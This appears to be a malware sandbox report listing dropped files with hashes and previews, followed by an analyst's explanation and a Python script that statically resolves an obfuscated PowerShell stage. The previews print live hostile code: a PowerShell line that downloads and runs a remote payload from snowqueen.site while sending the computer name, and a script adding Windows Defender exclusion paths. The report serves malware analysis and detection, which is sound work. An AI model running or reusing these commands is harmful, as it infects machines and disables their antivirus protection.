SHA-512: 2A9387DC43CA050C6D28FAEC4632EBBF898F1E8530F7099A8D59A28FB9E8FE7CD05E1C811D43AAEED92A2AA8E09001BB0724B758A44119E0E1B3EA03A09FD38D
Malicious: false
                                                                                                                                      Preview:..j..N....o.@..z.>/.P9N.".........T..1.....D.$....ZF.rb........Q..7.......Je....p.=fb....q......~.....L.1..F........co.|1|.r.$.].8...a..u.ub_...8....iJUs.#....c...B.y.......n"..KKq..V.>>.h...Q~kcF..oo.N..zl. .o...~.;...K.CV.....`A5.O..*H.K..c...[2....P$|..4....}..Tw..I...}.0...XR]..2...U*..S..A#.N.r......0K...b@...W.U.kv..n......t.Z./.+n.5../...T........P..[.hX._Y.9'.)iaA.S?..U..[.h.....!].%TXA.....=..L..T.A........*`.H........!..u...2..QF...0G.-.......1..V. .?...S.W.Fm(k..?-B..'.])5.?O:......X?...*...*-FX].[..x#.X....HV.i..:..F...........h...4...j.T.az.5L..qo.".\."...:.{..<.S.......a...p.....q$.....q.2^.f......w`.....l.?......@..9....R..`..6n.........2.(.<..N}.hu.q-;.xTM.;..J. .....~.."....-.....BR..EF...T\Tb..h........bD.....P....?.Z8..pM...3F........-.&]B.N.....)Gn...M....f...N"0L..XZ........U|...C..5.3.h9...L..c......Ei.M.}..=l.r..}U..........U..iFZMA....v...y4J##....... Ko.u.9.0...5...#l.K...].....".#.....;....6U..%.9......@.

Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.620254876639106
Encrypted: false
SSDEEP: 12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1: F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256: 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512: 57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious: true
Antivirus:
  • ReversingLabs, Detection: 3%
Joe Sandbox View:
  • Filename: !SET__UP.exe, Detection: malicious
  • Filename: file.exe, Detection: malicious
  • Filename: file.exe, Detection: malicious
  • Filename: lem.exe, Detection: malicious
  • Filename: receipt-016.vbs, Detection: malicious
  • Filename: Lw5RC3lKVg.exe, Detection: malicious
  • Filename: file.exe, Detection: malicious
  • Filename: 8Y78ZNdmmQ.exe, Detection: malicious
  • Filename: AacAmbientLighting.exe, Detection: malicious
  • Filename: AacAmbientLighting.exe, Detection: malicious
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      File Type:ASCII text, with very long lines (331), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):331
                                                                                                                                      Entropy (8bit):5.594951804280232
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:4wXsAEhF9wAJ7f50CvaV/gGkyIAvP4XrD57QjjLOLRB2DOexWb2R/JFtXXxNqCeS:4blFZfd4DkyIgPmQj6RB2DOexWb2R/JL
                                                                                                                                      MD5:EB8A82CF3676AEB10AF460E8A5049BE5
                                                                                                                                      SHA1:688C6C53179BB82D570FBED512DC417F81B2C541
                                                                                                                                      SHA-256:B7E1DD2A46E27759D538B5A7C76BE23A8010FA5322E093259FA6100B10CF7D14
                                                                                                                                      SHA-512:B61A14CB7D0005FB24FB1EC29231200AF1C5BF60E8B023EA717D30A81D7B801240B1911E42BCE14F3AF745F87516BFF12D1B06304313281FD3D11089145863CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://snowqueen.site/calling.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/538.1 (KHTML, like Gecko) Chrome/112.8.3.0 Safari/538.1'; IEx $Ptsr.Content;
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76800
                                                                                                                                      Entropy (8bit):7.997459006149351
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:0Wecu38LBUkWuKM0HNrtt5SdASeWntx74bQQQarnSxTeJmSy:TecTpWuuH1tqtx74bQWrcT1L
                                                                                                                                      MD5:DAF5DB58D0EB40ECB2601583B2661132
                                                                                                                                      SHA1:9EB1AFA55FC9AE390960E70B5810B71CC55DB60E
                                                                                                                                      SHA-256:9FB51AE7F6879DB47292B3B4C224D8252674CD4CF5352C82B656D9B2E2A3CC1B
                                                                                                                                      SHA-512:39C4727C7503561539AF133D5562C05FAE884398A511E824374B296744F3D2B366760776B891F36658FDD7C13E23C5FCCB0B672607845F4CC29B17A8D79FB428
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):54272
                                                                                                                                      Entropy (8bit):7.996986188065043
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:WLRw9YuDgWey7OG2SDGmcJEkm/8oBZhC7K7X+V:goTeJaGm4Ekm/8oBsIXs
                                                                                                                                      MD5:C914C95ED118A429085AAE251C8AD6E5
                                                                                                                                      SHA1:5D62F4B499BC5B1C222B7EF81CD885110ABCEE77
                                                                                                                                      SHA-256:97FB745E2A922C810F975985933149C086D808D86AAE6EA3C2AAAED1575EC766
                                                                                                                                      SHA-512:CA6870E4D4DF1AFBE281ACBD485051DBEAF9DC652152DF6A500BB93C8130C3471A2552107270E63E41AA2BE29C3CC9365C76343B931EC5D5A1E4781299749F9C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):63488
                                                                                                                                      Entropy (8bit):7.99720420005683
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:damaUYyw7Pd3NjW1Nk+lAZbgf5xpPAf94a7z:damatpr+lACf5xpK94av
                                                                                                                                      MD5:8DAFAA28609F75561A7911E86100BF81
                                                                                                                                      SHA1:AFEAA7BF40C0D21848642ADFD81BB98CA691D888
                                                                                                                                      SHA-256:C68981B3F765CFD8293FA033B5A0E5D15E864EC0DBDB9DD28B99733CDC62577A
                                                                                                                                      SHA-512:932FD3D1F7BA6E26BA894233FD5CD4555A94D0BA936CB66F75DAC7EBC9AEAEE9753CA2A917226BEDC3D870720D79289E4E8583B43E5F422D451D2FCD11312902
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):79872
                                                                                                                                      Entropy (8bit):7.9978910462934945
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:kPCKSem3nURXYvpfK3FWvSR3Uw22azqhbULPZ9C1z+IWY2lrK0cK57c:iCowpyD3UoazaILB9CcIWxr/cZ
                                                                                                                                      MD5:1A816E528E275788A97DFF666073F95E
                                                                                                                                      SHA1:25FE8B783EEF44E61E04FA5A1B8BB746E4E6A409
                                                                                                                                      SHA-256:633A5BCABB1B800E6643521E7771F9FCB5DA6DFF3934AE62D19BA00D7C905FCE
                                                                                                                                      SHA-512:1E2EA0B524ABBD3851BCBFB5F5405127050035D0E5A4014DBF8AA138191175B9F8E08AA34E0772604A8A875A45EA1084DD78EAB81054A957DDEA861E2B686A1A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20961
                                                                                                                                      Entropy (8bit):7.991812241746528
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:1hC3fnT8HXNrQS1Aw2EJ5Tg2n4kZEwgdaqbmessg3IF4MZYF3v8yIk35Rtc:C3bmkSSw2+62nNZETUQmesfIFAky1vC
                                                                                                                                      MD5:C5C0D5F08D770F056C0FC652D526B07A
                                                                                                                                      SHA1:3062A4B0DAB2A0C0FADB36503F58963F17B7DB3F
                                                                                                                                      SHA-256:5ABFD3AED85AA0AD6A4E8087919A5131F78FD1A7E6714EBF66089D9CD64DAB21
                                                                                                                                      SHA-512:3F82C060872B6CF3033AFAEEE6B6EE076F1784D349F46EF3EEE7287BDF86A17D36D6BC29EC2B68A02C5A43F87EB48A38D2CAAB5A5F8EDA223F7D407282103945
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:ASCII text, with very long lines (780), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):19591
                                                                                                                                      Entropy (8bit):5.117107578871211
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uQfo2dAnKPy6b9Iddv+ll4dN4syMUWX4rrozc3YIwnCWSC83uIIMiXRETIYo/Hgs:uQfvdEyIQU4LMvIr6c3qKp3uIbSREqP
                                                                                                                                      MD5:4BAF849B6D7587BBEE16BC5A96022D1F
                                                                                                                                      SHA1:FAC2CB0CB4AB2E15821BCB0EC8044AB81964107F
                                                                                                                                      SHA-256:50A7D9FE6D2FFEFEF512A90455440CBCA438C4A255995C24023656410536BDF5
                                                                                                                                      SHA-512:4406A9175E676107E9006213D2240DA58161C60BE8372081077B710A829CAF0BFCE8EF9374E420EEEA894326F8812A5E0ECEBD35F0911DE1C16371B6C5AAD77C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Set Estate=L..tVAXHarder-Ignored-Uruguay-Invest-Nu-Consciousness-..oVIMadagascar-Puppy-Beginning-..InJeff-Patterns-Bernard-Logging-Sad-Overnight-Conditioning-..KhkmDescribe-Manitoba-Exclusion-Island-Inclusion-..MfvbBeat-Butterfly-Gear-Possibilities-America-..FyFoEpisodes-..TIdOrg-Killing-Bizarre-..vpwZOctober-Qt-Tablets-Recommended-..elEPensions-Did-Lender-Vary-..Set Supporting=8..RAMonkey-Configuration-..VWIUVerify-Olympic-Prices-F-David-Followed-Kruger-Singapore-..goCVBeginning-Rf-Males-Olive-Accidents-Graduation-..mgHdUtils-Dpi-Biblical-Benjamin-Cnn-..GkBox-..eAuKPenny-Sound-..XfYBelle-..dIAIp-..Set Kept=F..ZMTruth-Verzeichnis-Par-Evaluate-Chicken-..UcMRugby-On-Threesome-..xeRemedy-Floors-English-..VrBProceed-Whom-Verde-Poet-..NiGRod-Toshiba-Previous-Twin-Ballot-..jtEmergency-Tp-Safely-Cvs-Legacy-Authentic-..xnHousing-Casa-Affects-Taiwan-Borders-Warren-..EWMMailing-Overseas-Wound-Hb-..maaAllan-Atomic-Elements-Energy-Saint-Omissions-Mint-..Set Situations=A..ZDYVPasswords-Carriers-Fra
                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      File Type:ASCII text, with very long lines (780), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):19591
                                                                                                                                      Entropy (8bit):5.117107578871211
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uQfo2dAnKPy6b9Iddv+ll4dN4syMUWX4rrozc3YIwnCWSC83uIIMiXRETIYo/Hgs:uQfvdEyIQU4LMvIr6c3qKp3uIbSREqP
                                                                                                                                      MD5:4BAF849B6D7587BBEE16BC5A96022D1F
                                                                                                                                      SHA1:FAC2CB0CB4AB2E15821BCB0EC8044AB81964107F
                                                                                                                                      SHA-256:50A7D9FE6D2FFEFEF512A90455440CBCA438C4A255995C24023656410536BDF5
                                                                                                                                      SHA-512:4406A9175E676107E9006213D2240DA58161C60BE8372081077B710A829CAF0BFCE8EF9374E420EEEA894326F8812A5E0ECEBD35F0911DE1C16371B6C5AAD77C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Set Estate=L..tVAXHarder-Ignored-Uruguay-Invest-Nu-Consciousness-..oVIMadagascar-Puppy-Beginning-..InJeff-Patterns-Bernard-Logging-Sad-Overnight-Conditioning-..KhkmDescribe-Manitoba-Exclusion-Island-Inclusion-..MfvbBeat-Butterfly-Gear-Possibilities-America-..FyFoEpisodes-..TIdOrg-Killing-Bizarre-..vpwZOctober-Qt-Tablets-Recommended-..elEPensions-Did-Lender-Vary-..Set Supporting=8..RAMonkey-Configuration-..VWIUVerify-Olympic-Prices-F-David-Followed-Kruger-Singapore-..goCVBeginning-Rf-Males-Olive-Accidents-Graduation-..mgHdUtils-Dpi-Biblical-Benjamin-Cnn-..GkBox-..eAuKPenny-Sound-..XfYBelle-..dIAIp-..Set Kept=F..ZMTruth-Verzeichnis-Par-Evaluate-Chicken-..UcMRugby-On-Threesome-..xeRemedy-Floors-English-..VrBProceed-Whom-Verde-Poet-..NiGRod-Toshiba-Previous-Twin-Ballot-..jtEmergency-Tp-Safely-Cvs-Legacy-Authentic-..xnHousing-Casa-Affects-Taiwan-Borders-Warren-..EWMMailing-Overseas-Wound-Hb-..maaAllan-Atomic-Elements-Energy-Saint-Omissions-Mint-..Set Situations=A..ZDYVPasswords-Carriers-Fra
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):53248
                                                                                                                                      Entropy (8bit):7.996132095968121
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:SeGlZUBS06fkwxMxA0d4u2h6QB56Vizdsypnfc/:SeG506fXxf0n2h0Kdbfc/
                                                                                                                                      MD5:A543999CAB76EE90AFBEC46D01CDE9F7
                                                                                                                                      SHA1:D309A389FABDAF03740DF7231D1333CBA035C5A9
                                                                                                                                      SHA-256:962E7A142ED61D5A0D0F4EF4C560F9734C213D5201DFDC286646903F291FC92A
                                                                                                                                      SHA-512:5AF47CBAE0C47FACFD055221E3EF1468A7F4535BC573236687BE117C2690F6DCF764491DEB43CB0A0CD25F4222CC657EC1039A800B55831DF199E30DF70FE11A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76800
                                                                                                                                      Entropy (8bit):7.9975070062640174
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:FC8zEjXAuACtZBqGv4Q63QLT9v9h5rptdt9xZNIpU60yshHW5Gth0hES:FC8zitACjN4Q63QLTtdrFt9xDIqVyA7g
                                                                                                                                      MD5:9BFE72521C1644D8B185D255E44A8B54
                                                                                                                                      SHA1:F976B6B3FDECBABE01B55D2828712FD8FB121F25
                                                                                                                                      SHA-256:8B9306D6DA01DA87779DE0F9D6E935BEA94BDD2992DECCC2790200173EE6DD3D
                                                                                                                                      SHA-512:5272B5C25F8FCE9354EA107CE1714ADE0AD4C122E8E5ED3FBE475EFD5E981AB918BD5E00A6E7E35FA87C6ECC60D0C1655B3BE3E4AF745087C64F4E34FD566876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.=N.~.%._.*s...>...v...TR....e.C.....~"&N]G-..x.=.~l..|.A..$-........H.....t#.[..0......'z.&..df.6.m.......s...*k .H.^...gx......1.....hu..H..*...m...A.........A-].P....3@"... =..s.....|.........p.U...F...e...7......Q;.}.%....#3h*...g.R....|h.\...]#.f..c4k...8.p..OGC8:.....h...veje..V..}.p."L.P....S...a...h.......n..j.u[..{..uD..=..e...G.....d#.d...V...o.2rw,/.2.d.8.&.o...M?..p...w..1..+L..g...J...W^.%53U........X,(........E6>...`..g.K..5....._.....Fn..X5.(.....\(.0p.oPF..&..*/.l..n|....W.I.3.v...f.3n...`'.m..}...{..A.........oNaeP.b..{..W...`.1*.......F.}.p..T.y...> .7j..<c.i...O)A..t.Lde...-Y.D-.....W......k.....[...s.i.P.....b.\.I..9SX...%.r<...........%G.?..(!...=.}.%S)H.M.#....|.....>xl...B.1p/|....8....8.m...[...r...+.....s......bh..+.y...\....,...h...!-..B%.2.....k#...v...j].9.....:X.@..F..3....1.0..O<.!..^....c..kK..-..#.{j@.R=,N.9hm7.$......n.1jld.'[P....,.Vj.vW.....b..-...p.I......G..A.8;..y0.x?..#..P...;..J./....b..G.vH
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):893607
                                                                                                                                      Entropy (8bit):6.6202539280413335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:0pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:0T3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                      MD5:508DD472A89794E64AD5EEB315F9939D
                                                                                                                                      SHA1:FCC1C958D5624BC06AA741D7DDBBCB519521D2E3
                                                                                                                                      SHA-256:EF279E2EEF2F3F56EBAC738D3EAC31CA1EE46A201998BFE941CCB940B947C221
                                                                                                                                      SHA-512:884019D1FA05C22F8056BA0CFCE3505102DCA9A3E97982AA1219070B3A900CDAA8C20805C42679C904BAC5BD2994471AF8C863A1C76597406C66F50CB569B48D
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58368
                                                                                                                                      Entropy (8bit):7.996670641656827
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:3vHkVbuKTAScfh9uL+5H5aILCMbQBRZ+IV4mKh:vkV3sScfh94I59L3kDYY4/
                                                                                                                                      MD5:6E266F7D1CE6DE046D338658EA61C1F8
                                                                                                                                      SHA1:A413F884534AE8EEFD131BF6918EC03AB8A863DC
                                                                                                                                      SHA-256:4884CB6483D184B09E89A2A6912E7FF3046F428FB1AEB1332D31D110C64ABB09
                                                                                                                                      SHA-512:BFB704CD2D16DA650D906F812C2052F51301CA4B2E3A98F0DCA8E9811D7EB371205DBC5655D858331779BBEAE9D09ADCE8BDA1228C39F4731F791D4C346103AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:q.....v~.-Oj..*g{.....I....o..o.6.H..$...e.z=%..v.D[.Y.K.y..PB5..d.F....&.Z.<h.;.*..'?.;Q"..v@u.:8.'SB.P%..)...0.Y.a...OI......f7...z... }.8.l5.+..4...'......j...7..%......f~.......@o3..............{.@#....2...S..p.d.....w{.9r.J...XZ..-K..g..[.P..~v.o........l.h....._..q....M....uy\U..[.......u.N:.n....dV...u{z.%)Z|>.X.B...V..d.P#7qUO.x%... })d..hYEN.%h.o.;.....7...a.R...."...n.O8.U.E`...@.m}1......=!.....?.Yh.j ....*V..m..e...........W.........."k....R}..A.-.v.]..2).b.\.~ai.Y.../.9.,^...*q.2U..G#(.A.az..v...._.&..*..w.o.k..........zyQ..k../n.'gB:/.{.......;GT..#%M..#zZU.v&..g...9.......F.....i...`.Q|..g.J.Wr..5'...y&IU\......B`<.....K.)....Q...:$.:PT.,..{o.....\..%..Z..*...~........4.....<..Y.|.n..v>.....z.n.=...e...FZ.......M...A../t."E...\-W.....1F..I.b.n#....m......?.....Y.,06.4...p7[.w..%...o.........J.W.d.>K......a.QQ8.Z.H/qm......B..u.ye...+...E.-..=n...\CFS...4.T.5I.U.....I.(v..I...<...8.,.a.R.......v.rP.X.;o.....?..J.@.....A..?.(
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      File Type:ASCII text, with very long lines (619), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):619
                                                                                                                                      Entropy (8bit):5.708869778857825
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:z/ubfzLgyaI4vY8lRzLgyaI4HYF+SLknpHi3t1O+FrAcZYWnefxo0zLgyaIS1+/:z/uLzLCQezLCHYdLknxMt17AqYWefxnN
                                                                                                                                      MD5:909DABB4B6591DDCBE2DF0395650DCCA
                                                                                                                                      SHA1:51FDEF10C5AADD9DA387464A016223CE1FEF0F1D
                                                                                                                                      SHA-256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3
                                                                                                                                      SHA-512:E97C71230052E8E24AFA4E0030E45D3CC3473ABECEB1B08BD2C1C8CEFC0F97A7591F831C5E1A82F2E8836BAC6FD06EFBA8314AECD539ACB1CA06C46893793323
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j5q7+"'$env:APPDATA'");$b0zl6kj8x3d=New-Object System.Text.ASCIIEncoding;$x5jh9y2k7zl=($m3x8yk2j5q7+"'C:\ProgramData'");$n7fh5x2j8lk=$b0zl6kj8x3d.GetBytes("UniqueString2");iex $w2fh6zk3l9jy;iex $v4jk8x7l2fh;iex $x5jh9y2k7zl;$j3yk9zl7f5h=[System.Diagnostics.Process]::GetCurrentProcess().CloseMainWindow();$c6zk8fj2yl9=[System.Text.Encoding]::UTF8.GetString($n7fh5x2j8lk)
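The dropped script above is a short Defender-tampering stage: one variable holds the literal "Add-MpPreference -ExclusionPath ", three more variables append a quoted path to it ('$env:TEMP', '$env:APPDATA' and 'C:\ProgramData'), and each of the three is handed to iex, so the unpacked payload's working directories are excluded from Defender scanning before it runs. The ASCII/UTF8 GetBytes/GetString statements and the ASCIIEncoding object are never used and only pad the file (changing its hash and ssdeep); CloseMainWindow() hides the console. The following Python resolver is an added example, not part of the sandbox report or of the malware: it walks the statements, tracks string-valued variables and concatenations, and prints the command text each iex would execute, with the script text taken verbatim from the preview. The handling of ';' as a statement separator and the rejection of anything that is not a string literal, string variable or '+' are simplifying assumptions that fit this sample, not a general PowerShell parser.

```python
"""Statically resolve the string-building obfuscation in the PowerShell
one-liner dropped by Contrast.com and report what each `iex` executes.
Added example; the script text is copied from the dropped-file preview."""
import re
from typing import Dict, List, Optional

# Verbatim content of the 619-byte dropped file (not constructed).
DROPPED_SCRIPT = r'''$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j5q7+"'$env:APPDATA'");$b0zl6kj8x3d=New-Object System.Text.ASCIIEncoding;$x5jh9y2k7zl=($m3x8yk2j5q7+"'C:\ProgramData'");$n7fh5x2j8lk=$b0zl6kj8x3d.GetBytes("UniqueString2");iex $w2fh6zk3l9jy;iex $v4jk8x7l2fh;iex $x5jh9y2k7zl;$j3yk9zl7f5h=[System.Diagnostics.Process]::GetCurrentProcess().CloseMainWindow();$c6zk8fj2yl9=[System.Text.Encoding]::UTF8.GetString($n7fh5x2j8lk)'''

ASSIGN_RE = re.compile(r'^\$(\w+)=(.*)$', re.S)
# Tokens we understand: $variable references and double-quoted literals.
TOKEN_RE = re.compile(r'\$\w+|"[^"]*"')
# Only a pure mix of those tokens joined by '+' is treated as a string expression.
STRING_EXPR_RE = re.compile(r'(?:\$\w+|"[^"]*"|\+|\s)*')
INVOKE_RE = re.compile(r'^(?:iex|Invoke-Expression)\s+\$(\w+)$', re.I)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']*)'", re.I)


def resolve_expr(expr: str, env: Dict[str, str]) -> Optional[str]:
    """Resolve a string literal or a '+'-concatenation of literals and
    already-known string variables. Anything else (.NET calls, New-Object,
    method invocations) is dead code for our purposes and yields None."""
    expr = expr.strip()
    if expr.startswith('(') and expr.endswith(')'):
        expr = expr[1:-1]
    if not STRING_EXPR_RE.fullmatch(expr):
        return None
    parts: List[str] = []
    for tok in TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            parts.append(tok[1:-1])          # keep $env:... unexpanded (runtime value)
        elif tok[1:] in env:
            parts.append(env[tok[1:]])
        else:
            return None                      # reference to a non-string variable
    return ''.join(parts) if parts else None


def resolve_invocations(script: str) -> List[str]:
    """Walk the ';'-separated statements (assumption: no ';' inside strings),
    track string-valued variables, and return the text each iex executes."""
    env: Dict[str, str] = {}
    executed: List[str] = []
    for stmt in script.split(';'):
        stmt = stmt.strip()
        m = INVOKE_RE.match(stmt)
        if m:
            executed.append(env.get(m.group(1), f'<unresolved ${m.group(1)}>'))
            continue
        m = ASSIGN_RE.match(stmt)
        if m:
            value = resolve_expr(m.group(2), env)
            if value is not None:
                env[m.group(1)] = value
    return executed


def exclusion_paths(script: str) -> List[str]:
    """Defender exclusion paths the script adds, as written in the script."""
    paths: List[str] = []
    for cmd in resolve_invocations(script):
        paths.extend(EXCLUSION_RE.findall(cmd))
    return paths


if __name__ == '__main__':
    for cmd in resolve_invocations(DROPPED_SCRIPT):
        print(cmd)
    print('exclusions:', exclusion_paths(DROPPED_SCRIPT))
```

Running it lists the three Add-MpPreference commands and the paths %TEMP%, %APPDATA% and C:\ProgramData. Note that for this sample the obfuscation is shallow: the cmdlet name and its parameter remain one contiguous literal, so a plain substring or Sigma rule on "Add-MpPreference -ExclusionPath" in script block logging (Event ID 4104) fires without any resolution; the resolver matters when the literal is split across variables. On a host where this ran, Defender records the configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, and the current list can be audited with Get-MpPreference (ExclusionPath) and cleaned with Remove-MpPreference -ExclusionPath.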
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
